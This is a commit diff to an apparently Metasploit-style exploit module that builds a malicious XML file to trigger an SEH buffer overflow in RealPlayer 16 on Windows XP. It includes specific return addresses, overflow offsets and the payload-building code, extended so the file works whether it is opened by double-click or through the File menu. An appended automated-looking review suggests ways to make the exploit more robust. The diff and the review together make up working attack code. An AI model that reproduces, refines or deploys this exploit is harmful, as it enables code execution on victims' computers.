
Commit f687a14

author
sgabe
committed
Added support for opening via menu.
1 parent 287271c commit f687a14

1 file changed

+11
-12
lines changed


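--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -49,16 +49,16 @@ def initialize(info = {})
 [
 [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51',
 {
-'Offset' => 2540,
-'Ret' => 0x641930c8, # POP POP RET from rpap3260.dll
-'Max' => 3095, # overflow occurs at 3080 byte
+'OffsetClick' => 2540, # Open via double click
+'OffsetMenu' => 13600, # Open via File -> Open
+'Ret' => 0x641930C8, # POP POP RET from rpap3260.dll
 }
 ],
 [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
 {
-'Offset' => 2540,
-'Ret' => 0x63A630B8, # POP POP RET from rpap3260.dll
-'Max' => 3095, # overflow occurs at 3080 byte
+'OffsetClick' => 2540, # Open via double click
+'OffsetMenu' => 13600, # Open via File -> Open
+'Ret' => 0x63A630B8, # POP POP RET from rpap3260.dll
 }
 ]
 ],
@@ -76,16 +76,15 @@ def initialize(info = {})
 
 def exploit
 
-sploit = "<?xml version=\"";
-sploit << rand_text_alpha_upper(target['Offset'])
+sploit = rand_text_alpha_upper(target['OffsetClick'])
 sploit << generate_seh_payload(target.ret)
-sploit << make_nops(target['Max']-sploit.length)
-sploit << "\"?>";
+sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length)
+sploit << generate_seh_payload(target.ret)
+sploit << rand_text_alpha_upper(17000) # Generate exception
 
 # Create the file
 print_status("Creating '#{datastore['FILENAME']}' file ...")
-
-file_create(sploit)
+file_create("<?xml version=\"" + sploit + "\"?>")
 
 end
 end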
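Review bot: The trailing length `17000` on new line 83 is the one per-target size the commit leaves hard-coded inside `exploit`, right after it moved the other sizes into each target's hash as `OffsetClick`/`OffsetMenu`; giving it a key next to them (a name along the lines of `'Trailer' => 17000`, constructed name) keeps all tunables in one place should a future target need a different value. The comment `# Generate exception` says what the bytes are for but not why this many, which is presumably tied to the `13600` menu offset; a one-line note stating that relationship, or that the value was found empirically, spares the next maintainer from re-deriving it. On new line 81 the padding length `target['OffsetMenu'] - sploit.length` assumes the click-path chunk plus the SEH payload is shorter than `OffsetMenu`, so an oversize payload would produce a negative length with no clear error; a guard such as `fail_with(Failure::BadConfig, 'Payload too large for OffsetMenu') if sploit.length > target['OffsetMenu']` before that line reports the misconfiguration explicitly. The whole body of `exploit` is inside the hunk.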
